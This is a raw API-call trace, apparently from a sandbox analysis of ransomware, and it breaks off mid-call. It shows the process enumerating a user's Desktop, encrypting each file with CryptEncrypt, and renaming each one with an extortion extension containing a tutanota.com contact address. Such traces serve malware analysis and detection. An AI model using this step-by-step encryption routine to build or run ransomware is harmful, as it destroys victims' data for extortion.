ftLastAccessTime.dwHighDateTime=0x1d5d8a9, ftLastWriteTime.dwLowDateTime=0x841b9350, ftLastWriteTime.dwHighDateTime=0x1d5d8a9, nFileSizeHigh=0x0, nFileSizeLow=0x16297, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dXciNA aPSS.ppt", cAlternateFileName="DXCINA~1.PPT")) returned 1 [0120.272] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.272] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.272] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.272] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.272] GetLastError () returned 0x0 [0120.272] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dXciNA aPSS.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dxcina apss.ppt"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.272] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.273] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x16297, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.273] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.273] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.273] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.273] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.274] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.274] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.274] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dXciNA aPSS.ppt", dwFileAttributes=0x80) returned 1 [0120.274] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dXciNA aPSS.ppt") returned 54 [0120.274] GetProcessHeap () returned 0x410000 [0120.274] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xdc) returned 0x460008 [0120.274] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dXciNA aPSS.ppt" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dXciNA aPSS.ppt") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dXciNA aPSS.ppt" [0120.274] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dXciNA aPSS.ppt", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dXciNA aPSS.ppt.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dXciNA aPSS.ppt.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.274] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=90775) returned 1 [0120.274] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x16297 [0120.274] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.274] GetProcessHeap () returned 0x410000 [0120.274] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0120.274] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.274] WriteFile (in: hFile=0x4a4, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.276] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.277] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.278] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x16297) returned 0xf50048 [0120.279] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x16297) returned 0xf662e8 [0120.279] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.279] ReadFile (in: hFile=0x4a4, lpBuffer=0xf50048, nNumberOfBytesToRead=0x16297, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x16297, lpOverlapped=0x0) returned 1 [0120.281] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-90775, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.281] WriteFile (in: hFile=0x4a4, lpBuffer=0xf662e8*, nNumberOfBytesToWrite=0x16297, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf662e8*, lpNumberOfBytesWritten=0x367f44c*=0x16297, lpOverlapped=0x0) returned 1 [0120.283] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf50048 | out: hHeap=0x410000) returned 1 [0120.283] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf662e8 | out: hHeap=0x410000) returned 1 [0120.283] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x16297, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.283] CloseHandle (hObject=0x4a4) returned 1 [0120.285] GetProcessHeap () returned 0x410000 [0120.285] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.285] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dXciNA aPSS.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dxcina apss.ppt"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dXciNA aPSS.ppt.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dxcina apss.ppt.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.288] GetProcessHeap () returned 0x410000 [0120.288] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.288] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0120.288] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0120.288] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43d858 | out: hHeap=0x410000) returned 1 [0120.288] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf00fdd50, ftCreationTime.dwHighDateTime=0x1d5e245, ftLastAccessTime.dwLowDateTime=0x3c328910, ftLastAccessTime.dwHighDateTime=0x1d5d8b6, ftLastWriteTime.dwLowDateTime=0x3c328910, ftLastWriteTime.dwHighDateTime=0x1d5d8b6, nFileSizeHigh=0x0, nFileSizeLow=0x6813, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ebVZH0Gy-oMGa82lbgW.wav", cAlternateFileName="EBVZH0~1.WAV")) returned 1 [0120.288] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.288] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.288] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.288] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.288] GetLastError () returned 0x0 [0120.288] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ebVZH0Gy-oMGa82lbgW.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ebvzh0gy-omga82lbgw.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.288] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.288] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x6813, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.288] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.288] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.289] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.289] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.289] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.289] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.289] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ebVZH0Gy-oMGa82lbgW.wav", dwFileAttributes=0x80) returned 1 [0120.290] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ebVZH0Gy-oMGa82lbgW.wav") returned 62 [0120.290] GetProcessHeap () returned 0x410000 [0120.290] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xec) returned 0x449878 [0120.290] lstrcpyW (in: lpString1=0x449878, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ebVZH0Gy-oMGa82lbgW.wav" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ebVZH0Gy-oMGa82lbgW.wav") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ebVZH0Gy-oMGa82lbgW.wav" [0120.290] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ebVZH0Gy-oMGa82lbgW.wav", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ebVZH0Gy-oMGa82lbgW.wav.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ebVZH0Gy-oMGa82lbgW.wav.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.290] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=26643) returned 1 [0120.290] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x6813 [0120.290] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.290] GetProcessHeap () returned 0x410000 [0120.290] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0120.290] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.292] WriteFile (in: hFile=0x4a4, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.293] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.294] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.295] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6813) returned 0x4d8b68 [0120.296] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6813) returned 0x4df388 [0120.296] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.296] ReadFile (in: hFile=0x4a4, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0x6813, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0x6813, lpOverlapped=0x0) returned 1 [0120.296] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-26643, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.296] WriteFile (in: hFile=0x4a4, lpBuffer=0x4df388*, nNumberOfBytesToWrite=0x6813, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4df388*, lpNumberOfBytesWritten=0x367f44c*=0x6813, lpOverlapped=0x0) returned 1 [0120.298] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0120.298] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4df388 | out: hHeap=0x410000) returned 1 [0120.298] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x6813, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.298] CloseHandle (hObject=0x4a4) returned 1 [0120.299] GetProcessHeap () returned 0x410000 [0120.299] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.299] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ebVZH0Gy-oMGa82lbgW.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ebvzh0gy-omga82lbgw.wav"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ebVZH0Gy-oMGa82lbgW.wav.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ebvzh0gy-omga82lbgw.wav.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.301] GetProcessHeap () returned 0x410000 [0120.301] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449878 | out: hHeap=0x410000) returned 1 [0120.301] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0120.301] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0120.301] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a78 | out: hHeap=0x410000) returned 1 [0120.301] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a90e7c0, ftCreationTime.dwHighDateTime=0x1d5d94a, ftLastAccessTime.dwLowDateTime=0x10f8acd0, ftLastAccessTime.dwHighDateTime=0x1d5e65c, ftLastWriteTime.dwLowDateTime=0x10f8acd0, ftLastWriteTime.dwHighDateTime=0x1d5e65c, nFileSizeHigh=0x0, nFileSizeLow=0x13ae8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EJTknm.wav", cAlternateFileName="")) returned 1 [0120.301] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.301] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.301] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.301] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.301] GetLastError () returned 0x0 [0120.301] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EJTknm.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ejtknm.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.301] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.302] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x13ae8, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.302] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.302] ReadFile (in: hFile=0x4a4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.302] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.302] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.303] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.303] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.303] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EJTknm.wav", dwFileAttributes=0x80) returned 1 [0120.303] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EJTknm.wav") returned 49 [0120.303] GetProcessHeap () returned 0x410000 [0120.303] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd2) returned 0x460008 [0120.303] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EJTknm.wav" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EJTknm.wav") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EJTknm.wav" [0120.303] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EJTknm.wav", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EJTknm.wav.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EJTknm.wav.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.303] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=80616) returned 1 [0120.303] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x13ae8 [0120.303] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.303] GetProcessHeap () returned 0x410000 [0120.303] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0120.303] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.304] WriteFile (in: hFile=0x4a4, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.306] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.307] WriteFile (in: hFile=0x4a4, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.308] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x13ae8) returned 0xf50048 [0120.309] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x13ae8) returned 0xf63b38 [0120.309] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.309] ReadFile (in: hFile=0x4a4, lpBuffer=0xf50048, nNumberOfBytesToRead=0x13ae8, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x13ae8, lpOverlapped=0x0) returned 1 [0120.311] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-80616, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.311] WriteFile (in: hFile=0x4a4, lpBuffer=0xf63b38*, nNumberOfBytesToWrite=0x13ae8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf63b38*, lpNumberOfBytesWritten=0x367f44c*=0x13ae8, lpOverlapped=0x0) returned 1 [0120.313] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf50048 | out: hHeap=0x410000) returned 1 [0120.313] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf63b38 | out: hHeap=0x410000) returned 1 [0120.313] UnlockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x13ae8, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.313] CloseHandle (hObject=0x4a4) returned 1 [0120.315] GetProcessHeap () returned 0x410000 [0120.315] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.315] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EJTknm.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ejtknm.wav"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EJTknm.wav.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ejtknm.wav.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.317] GetProcessHeap () returned 0x410000 [0120.317] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.317] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0120.317] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0120.317] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43d858 | out: hHeap=0x410000) returned 1 [0120.317] FindNextFileW (in: hFindFile=0x48edb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7418e00, ftCreationTime.dwHighDateTime=0x1d5e166, ftLastAccessTime.dwLowDateTime=0xe25d3c10, ftLastAccessTime.dwHighDateTime=0x1d5d7d3, ftLastWriteTime.dwLowDateTime=0xe25d3c10, ftLastWriteTime.dwHighDateTime=0x1d5d7d3, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ES9SX2pu4CAmZF.mp3", cAlternateFileName="ES9SX2~1.MP3")) returned 1 [0120.317] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.317] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.317] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.317] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.317] GetLastError () returned 0x0 [0120.317] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ES9SX2pu4CAmZF.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\es9sx2pu4camzf.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a4 [0120.318] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.318] LockFile (hFile=0x4a4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x2600, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.318] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.318] ReadFile 